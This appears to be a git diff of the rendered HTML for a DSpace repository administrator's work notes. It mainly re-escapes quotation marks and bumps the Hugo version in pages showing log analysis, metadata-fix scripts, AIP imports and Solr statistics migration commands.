<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -162,7 +162,7 @@
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -323,16 +323,16 @@ DELETE 1
</ul>
</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
4432 200
</code></pre><ul>
<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li>
<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2019-04/'>Read more →</a>
</article>
@ -388,7 +388,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li>
<li>The top IPs before, during, and after this latest alert tonight were:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -404,7 +404,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li>
<li>There were just over 3 million accesses in the nginx logs last month:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s
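# Per-day breakdown over the same logs (a quick sketch):
# zcat --force /var/log/nginx/* | grep -oE &#34;[0-9]{1,2}/Jan/2019&#34; | sort | uniq -c | sort -n | tail -n 5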

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -95,7 +95,7 @@
<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li>
<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -293,7 +293,7 @@
<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li>
<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
</code></pre><ul>
<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="/cgspace-notes/2018-03/">March, 2018</a></li>
<li>Time to index ~70,000 items on CGSpace:</li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -151,11 +151,11 @@
<li>I notice this error quite a few times in dspace.log:</li>
</ul>
<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
</code></pre><ul>
<li>And there are many of these errors every day for the past month:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -251,12 +251,12 @@ dspace.log.2018-01-02:34
<ul>
<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
</code></pre><ul>
<li>Generate list of authors on CGSpace for Peter to go through and correct:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
</code></pre>
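<p>A hedged follow-up (assuming authors are <code>metadata_field_id=3</code>, as in the correction commands elsewhere in these notes): counting the author strings that occur only once gives a rough sense of the long tail of likely typos:</p>
<pre tabindex="0"><code>dspace=# select count(*) from (select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 group by text_value having count(*)=1) as singletons;
</code></pre>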
<a href='https://alanorth.github.io/cgspace-notes/2017-11/'>Read more →</a>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGIAR Library Migration"/>
<meta name="twitter:description" content="Notes on the migration of the CGIAR Library to CGSpace"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -163,7 +163,7 @@ mets.dspaceAIP.ingest.crosswalk.DSPACE-ROLES = NIL
</code></pre><ul>
<li><input checked="" disabled="" type="checkbox"> Import communities and collections, paying attention to options to skip missing parents and ignore handles:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ export PATH=$PATH:/home/cgspace.cgiar.org/bin
$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2515/10947-2515.zip
$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2516/10947-2516.zip
@ -201,7 +201,7 @@ $ for item in 10568-93760/ITEM@10947-465*; do dspace packager -r -f -u -t AIP -e
</ul>
<pre tabindex="0"><code>$ for item in 10568-93759/ITEM@10947-46*; do dspace packager -r -t AIP -o ignoreHandle=false -o ignoreParent=true -e aorth@mjanja.ch -p 10568/83538 $item; done
</code></pre><p><strong>Get the handles for the last few items from CGIAR Library that were created since we did the migration to DSpace Test in May:</strong></p>
<pre tabindex="0"><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; '2017-05-01T00:00:00Z');
<pre tabindex="0"><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; &#39;2017-05-01T00:00:00Z&#39;);
</code></pre><ul>
<li>Export them from the CGIAR Library:</li>
</ul>
@ -218,19 +218,19 @@ $ for item in 10568-93760/ITEM@10947-465*; do dspace packager -r -f -u -t AIP -e
<li><input checked="" disabled="" type="checkbox"> Enable nightly <code>index-discovery</code> cron job</li>
<li><input checked="" disabled="" type="checkbox"> Adjust CGSpace&rsquo;s <code>handle-server/config.dct</code> to add the new prefix alongside our existing 10568, ie:</li>
</ul>
<pre tabindex="0"><code>&quot;server_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
<pre tabindex="0"><code>&#34;server_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
&quot;replication_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
&#34;replication_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
&quot;backup_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
&#34;backup_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
</code></pre><p>I had regenerated the <code>sitebndl.zip</code> file on the CGIAR Library server and sent it to the Handle.net admins, but they said that there were mismatches between the public and private keys, which I suspect is due to <code>make-handle-config</code> not being very flexible. After discussing our scenario with the Handle.net admins they said we actually don&rsquo;t need to send an updated <code>sitebndl.zip</code> for this type of change, and the above <code>config.dct</code> edits are all that is required. I guess they just did something on their end by setting the authoritative IP address for the 10947 prefix to be the same as ours&hellip;</p>
<ul>
@ -250,17 +250,17 @@ $ sudo systemctl start nginx
</code></pre><h2 id="troubleshooting">Troubleshooting</h2>
<h3 id="foreign-key-error-in-dspace-cleanup">Foreign Key Error in <code>dspace cleanup</code></h3>
<p>The cleanup script is sometimes used during import processes to clean the database and assetstore after failed AIP imports. If you see the following error with <code>dspace cleanup -v</code>:</p>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(119841) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(119841) is still referenced from table &#34;bundle&#34;.
</code></pre><p>The solution is to set the <code>primary_bitstream_id</code> to NULL in PostgreSQL:</p>
<pre tabindex="0"><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (119841);
</code></pre><h3 id="psqlexception-during-aip-ingest">PSQLException During AIP Ingest</h3>
<p>After a few rounds of ingesting—possibly with failures—you might end up with inconsistent IDs in the database. In this case, during AIP ingest of a single collection in submit mode (-s):</p>
<pre tabindex="0"><code>org.dspace.content.packager.PackageValidationException: Exception while ingesting 10947-2527/10947-2527.zip, Reason: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &quot;handle_pkey&quot;
<pre tabindex="0"><code>org.dspace.content.packager.PackageValidationException: Exception while ingesting 10947-2527/10947-2527.zip, Reason: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &#34;handle_pkey&#34;
Detail: Key (handle_id)=(86227) already exists.
</code></pre><p>The normal solution is to run the <code>update-sequences.sql</code> script (with Tomcat shut down) but it doesn&rsquo;t seem to work in this case. Finding the maximum <code>handle_id</code> and manually updating the sequence seems to work:</p>
<pre tabindex="0"><code>dspace=# select * from handle where handle_id=(select max(handle_id) from handle);
dspace=# select setval('handle_seq',86873);
dspace=# select setval(&#39;handle_seq&#39;,86873);
</code></pre>
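<p>To double-check afterwards (a small sketch, assuming the same PostgreSQL schema), the sequence&rsquo;s current value can be read back directly:</p>
<pre tabindex="0"><code>dspace=# select last_value from handle_seq;
</code></pre>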

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace CG Core v2 Migration"/>
<meta name="twitter:description" content="Possible changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -445,7 +445,7 @@
</ul>
<hr>
<p>¹ Not committed yet because I don&rsquo;t want to have to make minor adjustments in multiple commits. Re-apply the gauntlet of fixes with the sed script:</p>
<pre tabindex="0"><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &quot;*.xsl&quot; -exec sed -i -f ./cgcore-xsl-replacements.sed {} \;
<pre tabindex="0"><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &#34;*.xsl&#34; -exec sed -i -f ./cgcore-xsl-replacements.sed {} \;
</code></pre>
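<p>The sed script itself is just a list of substitution commands; a hypothetical entry (not necessarily one of the actual mappings) would look like:</p>
<pre tabindex="0"><code>s/dc\.contributor\.author/dcterms.creator/g
</code></pre>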

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace DSpace 6 Upgrade"/>
<meta name="twitter:description" content="Documenting the DSpace 6 upgrade."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -129,283 +129,283 @@
</ul>
<h3 id="re-import-oai-with-clean-index">Re-import OAI with clean index</h3>
<p>After the upgrade is complete, re-index all items into OAI with a clean index:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;</span>
$ dspace oai -c import
</code></pre></div><p>The process ran out of memory several times so I had to keep trying again with more JVM heap memory.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;</span>
</span></span><span style="display:flex;"><span>$ dspace oai -c import
</span></span></code></pre></div><p>The process ran out of memory several times so I had to keep trying again with more JVM heap memory.</p>
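<p>A typical retry with a larger heap looked like this (a sketch; the exact <code>-Xmx</code> value varied):</p>
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx4096m&#34;
$ dspace oai -c import
</code></pre>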
<h3 id="processing-solr-statistics-with-solr-upgrade-statistics-6x">Processing Solr Statistics With solr-upgrade-statistics-6x</h3>
<p>After the main upgrade process was finished and DSpace was running, I started processing the Solr statistics with <code>solr-upgrade-statistics-6x</code> to migrate all IDs to UUIDs.</p>
<h2 id="statistics">statistics</h2>
<p>First process the current year&rsquo;s statistics core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;</span>
$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 3,817,407 Bistream View
1,693,443 Item View
105,974 Collection View
62,383 Community View
163,192 Community Search
162,581 Collection Search
470,288 Unexpected Type &amp; Full Site
--------------------------------------
6,475,268 TOTAL
=================================================================
</code></pre></div><p>After several rounds of processing it finished. Here are some statistics about unmigrated documents:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;</span>
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 3,817,407 Bistream View
</span></span><span style="display:flex;"><span> 1,693,443 Item View
</span></span><span style="display:flex;"><span> 105,974 Collection View
</span></span><span style="display:flex;"><span> 62,383 Community View
</span></span><span style="display:flex;"><span> 163,192 Community Search
</span></span><span style="display:flex;"><span> 162,581 Collection Search
</span></span><span style="display:flex;"><span> 470,288 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 6,475,268 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>After several rounds of processing it finished. Here are some statistics about unmigrated documents:</p>
<ul>
<li>227,000: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>471,000: <code>id:/.+-unmigrated/</code></li>
<li>698,000: <code>*:* NOT id:/.{36}/</code></li>
<li>Majority are <code>type: 5</code> (aka SITE, according to <code>Constants.java</code>), so we can purge them (after the quick count check sketched below):</li>
</ul>
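<p>A minimal way to verify those counts before purging (assuming the same local Solr instance on port 8081) is to ask Solr for <code>numFound</code> without returning any rows; <code>--data-urlencode</code> sidesteps shell and URL escaping issues with the regex queries:</p>
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; --data-urlencode &#34;q=*:* NOT id:/.{36}/&#34; --data-urlencode &#34;rows=0&#34;
$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; --data-urlencode &#34;q=id:/.+-unmigrated/&#34; --data-urlencode &#34;rows=0&#34;
</code></pre>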
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2019">statistics-2019</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2019">statistics-2019</h2>
<p>Processing the statistics-2019 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 5,569,344 Bistream View
2,179,105 Item View
117,194 Community View
104,091 Collection View
774,138 Community Search
568,347 Collection Search
1,482,620 Unexpected Type &amp; Full Site
--------------------------------------
10,794,839 TOTAL
=================================================================
</code></pre></div><p>After several rounds of processing it finished. Here are some statistics about unmigrated documents:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 5,569,344 Bistream View
</span></span><span style="display:flex;"><span> 2,179,105 Item View
</span></span><span style="display:flex;"><span> 117,194 Community View
</span></span><span style="display:flex;"><span> 104,091 Collection View
</span></span><span style="display:flex;"><span> 774,138 Community Search
</span></span><span style="display:flex;"><span> 568,347 Collection Search
</span></span><span style="display:flex;"><span> 1,482,620 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 10,794,839 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>After several rounds of processing it finished. Here are some statistics about unmigrated documents:</p>
<ul>
<li>2,690,309: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>1,494,587: <code>id:/.+-unmigrated/</code></li>
<li>4,184,896: <code>*:* NOT id:/.{36}/</code></li>
<li>4,172,929 are <code>type: 5</code> (aka SITE) so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2019/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2018">statistics-2018</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2019/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2018">statistics-2018</h2>
<p>Processing the statistics-2018 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2018
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 3,561,532 Bistream View
1,129,326 Item View
97,401 Community View
63,508 Collection View
207,827 Community Search
43,752 Collection Search
457,820 Unexpected Type &amp; Full Site
--------------------------------------
5,561,166 TOTAL
=================================================================
</code></pre></div><p>After some time I got an error about Java heap space so I increased the JVM memory and restarted processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx4096m&#39;</span>
$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2018
</code></pre></div><p>Eventually the processing finished. Here are some statistics about unmigrated documents:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2018
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 3,561,532 Bistream View
</span></span><span style="display:flex;"><span> 1,129,326 Item View
</span></span><span style="display:flex;"><span> 97,401 Community View
</span></span><span style="display:flex;"><span> 63,508 Collection View
</span></span><span style="display:flex;"><span> 207,827 Community Search
</span></span><span style="display:flex;"><span> 43,752 Collection Search
</span></span><span style="display:flex;"><span> 457,820 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 5,561,166 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>After some time I got an error about Java heap space so I increased the JVM memory and restarted processing:</p>
